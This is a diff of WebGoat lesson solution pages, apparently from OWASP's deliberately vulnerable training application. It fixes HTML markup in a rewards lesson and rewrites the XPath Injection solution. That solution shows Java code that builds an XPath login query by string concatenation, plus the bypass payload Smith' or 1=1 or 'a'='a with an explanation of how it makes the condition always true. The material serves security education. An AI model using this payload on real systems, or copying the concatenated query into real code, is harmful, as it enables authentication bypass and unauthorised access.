-<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>&lt;root&gt;</p></span>
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>&lt;root&gt;</span></p>
 
-<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>&lt;reward&gt;WebGoat t-shirt 20 Pts&lt;/reward&gt;</p></span>
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>&lt;reward&gt;WebGoat t-shirt 20 Pts&lt;/reward&gt;</span></p>
 
-<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>&lt;reward&gt;WebGoat Secure Kettle 50 Pts&lt;/reward&gt;</p></span>
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>&lt;reward&gt;WebGoat Secure Kettle 50 Pts&lt;/reward&gt;</span></p>
 
-<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>&lt;reward&gt;WebGoat Mug 30 Pts&lt;/reward&gt;</p></span>
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>&lt;reward&gt;WebGoat Mug 30 Pts&lt;/reward&gt;</span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>&lt;reward&gt;WebGoat Core Duo Laptop 2000
-Pts&lt;/reward&gt;</p></span>
+Pts&lt;/reward&gt;</span></p>
 
-<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>&lt;reward&gt;WebGoat Hawaii Cruise 3000 Pts&lt;/reward&gt;</p></span>
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>&lt;reward&gt;WebGoat Hawaii Cruise 3000 Pts&lt;/reward&gt;</span></p>
 
-<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>&lt;/root&gt;</p></span>
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>&lt;/root&gt;</span></p>
 
-<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></p>
-</span>
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
 
 <p class=MsoNormal style='page-break-after:avoid'><span style='mso-no-proof:
 yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_68" o:spid="_x0000_i1028"
@@ -827,7 +826,7 @@ field-end'></span><![endif]--> Select your reward</p>
 <p class=MsoNormal><o:p>&nbsp;</o:p></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Select the
-Laptop and the Cruise and click <EFBFBD>Submit<EFBFBD>.<o:p></o:p></span></p>
+Laptop and the Cruise and click "Submit".<o:p></o:p></span></p>
 
 <p class=MsoNormal><o:p>&nbsp;</o:p></p>
 

webgoat/main/project/WebContent/lesson_solutions/XPATHInjection.html

@@ -714,21 +714,19 @@ field-end'></span><![endif]--> XPath Injection</p>
 
 <p class=MsoNormal><o:p>&nbsp;</o:p></p>
 
-<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></b></p>
-
-<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></b></p>
-
-<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></b></p>
-
-<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>Solution:<o:p></o:p></span></b></p>
-
-<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></b></p>
-
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif";mso-bidi-font-weight:
 bold'>XPath injection is similar to SQL Injection. Input is not validated and
-used to create a XPath query. Injecting Smith' or 1=1 or 'a'='a will log you on
-as the first user defined in the system. Password is a required field, so there
-you can enter whatever you want.<o:p></o:p></span></p>
+used to create a XPath query. Here you can see how the XPATH query is built:<br><br>
+
+<i>String dir = s.getContext().getRealPath("/lessons/XPATHInjection/EmployeesData.xml");<br>
+File d = new File(dir);<br>
+XPathFactory factory = XPathFactory.newInstance();<br>
+XPath xPath = factory.newXPath();<br>
+InputSource inputSource = new InputSource(new FileInputStream(d));<br>
+String expression = "/employees/employee[loginID/text()='" + <font color="ff0000">username</font> + "' and passwd/text()='" + <font color="ff0000">password</font> + "']";<br>
+nodes = (NodeList) xPath.evaluate(expression, inputSource, XPathConstants.NODESET);</i><br>
+<br>
+</span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif";mso-bidi-font-weight:
 bold'><o:p>&nbsp;</o:p></span></p>
@@ -746,9 +744,18 @@ field-begin'></span><span style='mso-spacerun:yes'>
 <span style='mso-element:field-separator'></span><![endif]--><span
 style='mso-no-proof:yes'>2</span><!--[if supportFields]><span style='mso-element:
 field-end'></span><![endif]--> Inject XPath payload</p>
-
 <p class=MsoNormal><o:p>&nbsp;</o:p></p>
-
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif";mso-bidi-font-weight:
+bold'>
+Injecting Smith' or 1=1 or 'a'='a will log you on
+as the first user defined in the system. Password is a required field, so there
+you can enter whatever you want.<br><br>
+This is what the server gets:<br>
+<i>expression = "/employees/employee[loginID/text()='<font color="ff0000">Smith' or 1=1 or 'a'='a</font>' and passwd/text()='<font color="ff0000">password</font>']"</i><br><br>
+And this is how the server interprets it:<br>
+<i>expression = "/employees/employee[ <font color="ff0000">(</font> loginID/text()='<font color="0000ff">Smith' or 1=1 <font color="ff0000">) OR (</font> 'a'='a</font>' and passwd/text()='<font color="0000ff">password</font>' <font color="ff0000">)</font> ]"</i><br>
+</span></p>
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
 <p class=MsoNormal style='page-break-after:avoid'><span style='mso-no-proof:
 yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_143" o:spid="_x0000_i1025"
  type="#_x0000_t75" style='width:480pt;height:277.5pt;visibility:visible;

webgoat/main/project/WebContent/lesson_solutions/formate.css

@@ -0,0 +1,2 @@
+* { font-family:"Arial","sans-serif"; }
+code { font-family:"Courier New"; font-size:10pt; }